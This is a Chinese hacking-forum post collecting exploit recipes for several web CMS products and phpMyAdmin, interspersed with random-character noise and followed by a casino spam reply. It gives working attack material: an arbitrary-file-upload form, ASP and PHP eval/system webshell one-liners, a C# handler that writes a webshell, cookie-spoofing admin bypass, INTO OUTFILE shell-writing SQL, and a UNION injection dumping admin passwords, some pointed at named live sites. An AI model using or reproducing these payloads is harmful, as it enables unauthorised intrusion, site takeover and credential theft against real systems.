inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
# s# o1 z5 l5 V$ u: R% t$ Q8 w; P---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 k6 ?/ k$ d; a9 j; q2 E- ]. m+ N, x6 l
YxShop易想购物商城4.7.1版本任意文件上传漏洞7 Y- Y- k& S( s) z
: M, Q/ d' m$ w# {% ~# o; q
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
+ K& y" b2 r0 N6 M7 l' {跳转到网站根目录上传任意文件。0 C2 X( o* I! @: W& g) k" j3 `2 u
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件, R: o! G  M/ W
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">1 V$ B" t3 R8 W- [* A
Upload a new file:<br>
* A5 C9 n$ g7 O4 u<input type="file" name="NewFile" size="50"><br>! d# P: @# [8 L! s( Y
<input id="btnUpload" type="submit" value="Upload">" _7 ~7 q7 M9 L8 L, i) T
</form>
5 ]! A- B" s: a, B-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) H4 h" l8 F% L) p% ^# S% D9 H) o3 ?# [5 \$ g/ K
SDcms 后台拿webshell
; t( y2 N3 S" B. O7 c2 d) j8 U& q0 i
$ }( ?: p* u) t; D第一种方法:
* O5 w7 V- V% o, I  t+ ~! X进入后台-->系统管理-->系统设置-->系统设置->网站名称;
+ i' I; G8 O: ~' ?& k  M5 U: |把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
- y1 B& F" D- U* {+ a) Z用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
3 K( v& o4 k7 f& }3 X$ Y第二种方法:9 N7 P" N; b, T' f; `- y
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
0 z' |6 H7 {( q6 ?5 n; D& {在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
" W8 e  [1 ^; y* i- ^/ A# N第三种方法:
" K) F, J0 J3 F6 R: f, q进入后台-->界面管理-->模板文件管理-->创建文件
; _* u5 v" F* C+ R文件名写入getshell.ashx
8 ~! I7 J- l! R内容写入下面内容:
/ M) E( J$ t9 B+ _$ ~' b/====================复制下面的=========================/3 S0 h/ ?3 l, c( m$ p
<%@ WebHandler Language="C#" Class="Handler" %>) R' Q% h) ]( C) k" n3 A* }
using System;( e7 X+ [/ W8 G" F
using System.Web;
3 O; }7 r2 `9 x6 tusing System.IO;- S& W7 U3 E3 H- t- `% I+ f
public class Handler : IHttpHandler {# u5 w" d! L6 r# I) j. Y% D3 T
public void ProcessRequest (HttpContext context) {
3 }4 i6 Y+ ^( W7 v+ L' [context.Response.ContentType = "text/plain";0 y, |3 |0 {. x7 W. D( Q
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));0 @# @- A  D" v, K; b1 d! @
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
0 l* \; p! Z. X% w( j/ N3 Hfile1.Flush();
# G" j/ R: y0 v  N# Hfile1.Close();# F3 a* I% J( |
}
' o. ~! G0 t0 Q3 a6 N- ~7 x8 \public bool IsReusable {
" A, L/ F) U' @get {
2 T1 R. n( M" Kreturn false;8 j) n* O; {) t/ Y
}
7 {* m7 V! ^) t5 }, a/ I& |" n}# y" y; b" \+ n0 Z# t1 ]
}
$ c2 f* q( k, _6 e/ W# Q/=============================================/6 x( w3 O2 v. P( W. F
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
% w; h- F1 Q$ S1 a# G会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
% X4 P, J$ }3 E-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 {7 P+ A; Z7 r/ ]& K& b
1 q' l) D  u6 l; U" Z: Z9 {
ESCMS网站管理系统0day
- l  q% F9 S) r* Z* G. |% {" }7 x+ |! m
后台登陆验证是通过admin/check.asp实现的
! z- f3 p0 l2 u4 D. U/ s
) L( q( ]1 w% A( V* b2 _首先我们打开http://target.com/admin/es_index.html
# {3 B6 d# n7 F然后在COOKIE结尾加上
+ c3 Y$ l$ Q' B( s& [" Y; ESCMS$_SP2=ES_admin=st0p;
, N8 j& l1 B: L3 d修改,然后刷新
# j  P* B1 f- b  B: I. N进后台了嘎..
" s: a1 ]0 y8 G5 d0 H然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
9 d1 a2 `4 g  u& @; B( T5 b. k& q3 @* ~/ J& q) U
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.0 }  X( @, P+ G2 k+ b; T9 B) }4 ~
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
" w. f: u, v) y存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
; G- P5 G! I4 Q- I) {  K, c+ o在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
7 P' E, |) e8 Z8 f0 I! F" W------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ p/ D7 A( ^7 H5 _+ T1 n
  Q' {  a+ J8 y* _7 n/ y
宁志网站管理系统后台无验证漏洞及修复
- Z- Y  _/ f/ o4 o; `$ [+ y& h; _4 E4 |1 I7 l; e6 I: y3 k& L
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
+ P9 {4 r- r. x- J; V4 _官方网站:www.ningzhi.net1 r. E  @" J) s. b1 z3 i# U
学校网站管理系统 V.2011版本
) Z. v6 w+ x4 g* ?4 Z+ mhttp://down.chinaz.com/soft/29943.htm
% r4 J2 M, b/ r% C; |! J+ y1 N其它版本(如:政府版等),自行下载.3 O" V! o. X! ]( J
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
1 ?$ X0 W$ s* y# @+ F, O. H0 L. Klogin.asp代码如下:
" q6 _% k' x2 i5 r% u0 \<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 9 Z/ a8 c6 a/ z! @- K6 U
manage.asp代码我就不帖出来了.反正也没验证.* `- B8 o' ]/ X; r
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!- H. c0 u$ J: Y% S9 C/ l% V, l* ]
漏洞利用:' H) T# ~' b+ m* A* P) F% N
直接访问http://www.0855.tv/admin/manage.asp- [$ Q7 j1 ~8 s. `
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
% U0 E9 `/ c) |+ L3 G  M0 c' h" f----------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 ~$ e1 D0 S$ T. b3 J- s
: g. m3 ?3 {# S3 o4 j, x! ?3 Z
phpmyadmin拿shell的四种方法总结及修复! Q9 w1 u, ^" g! `" d/ p
6 F/ V8 H' I1 g1 F% u( [# S8 i" F
方法一:
$ h- \/ b5 y8 Z: YCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
3 s: ]4 L- N! x8 e. u5 }INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');& I  ~5 @! b2 Q6 z7 C4 ?
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
* j  b) n7 ?# Z: p, v0 f5 v& e1 P2 _----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
) u! l, Q+ A# ~. l) v+ k    一句话连接密码:7on
1 h5 X# g- r9 G1 Y7 J' ~( B方法二:+ d- F" |2 w2 _( ]
读取文件内容:    select load_file('E:/xamp/www/s.php');
; M, d- J2 V; s7 ~1 t2 y' q$ m写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'. ^4 }5 U( ~  C" v/ w9 q
cmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'! ^5 L5 e) |. [+ {7 B. N
方法三:2 @5 w& K4 W# _* {" U2 p1 U
JhackJ版本 PHPmyadmin拿shell
  D& t; J( W9 j, ?% }6 z7 QCreate TABLE study (cmd text NOT NULL);
6 b0 g3 ?1 L9 m! t% A% ]Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');& @, r6 x9 O9 {4 ]1 A
select cmd from study into outfile 'E:/wamp/www/7.php';/ d0 D5 K& a" J4 L4 A
Drop TABLE IF EXISTS study;
. r* F# [3 X1 b8 ?6 d+ R4 S* z<?php eval($_POST[cmd])?>
8 B. C; x" x( E, p  V, uCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。! E+ Z4 p# r0 I) G
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1  ~3 m+ s- D0 J4 V+ Y' n0 a
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
. l; w, X- S5 UDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
% o3 E1 j' C1 O2 W5 O方法四:& j: K5 R# d8 ]1 H8 @, L$ u
select load_file('E:/xamp/www/study.php');
) m: y  d' H- i5 _  v' ~- w0 G: {; Qselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
  {: |; }7 m6 N+ L# Q: a* n然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
; s: x2 A4 f5 c: y$ v-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 ?+ v8 L2 q" C' E
! O( L* W% l) ^+ |" oNO.001中学网站管理系统 Build 110628 注入漏洞1 U# h" P6 V& W' G6 M, ]
) K* L* ^3 j6 q2 D
NO.001中学网站管理系统功能模块:, s7 \; i8 s) T0 |
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等& \- O( G6 J& g- I5 c  ~
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息" L  B1 y5 V8 M5 H5 C
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
4 y9 P0 Z( [  O2 y; \4.视频图片管理:一级分类,动态添加视频或者图片等信息$ c# f4 G; Z  j9 k
5.留言管理:对留言,修改,删除、回复等管理
8 o8 c- l, u1 b* H& ^# _6.校友频道:包括校友资料excel导出、管理等功能& L4 W+ v2 n5 m9 T# U  L% x" G, A
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页( Z9 _) l" a# s' U2 |
默认后台:admin/login.asp
7 {7 p) P' b0 `官方演示:http://demo.001cms.net5 J+ S7 j1 V/ o8 B4 e  w5 z
源码下载地址:http://down.chinaz.com/soft/30187.htm" }( d9 z/ K% ^3 E! j1 |# k: D
EXP:! H, }# _8 @' R  \3 ]9 v4 Z& h
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin5 E6 p( \/ J, g/ k& z3 o4 c. b4 D; @' Y
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
5 a0 i3 h& ?. ^# w3 r2 Kgetshell:后台有备份,你懂的- x/ \, S( P/ ^& ^# l
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
( X, U) }: J& ]0 P-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表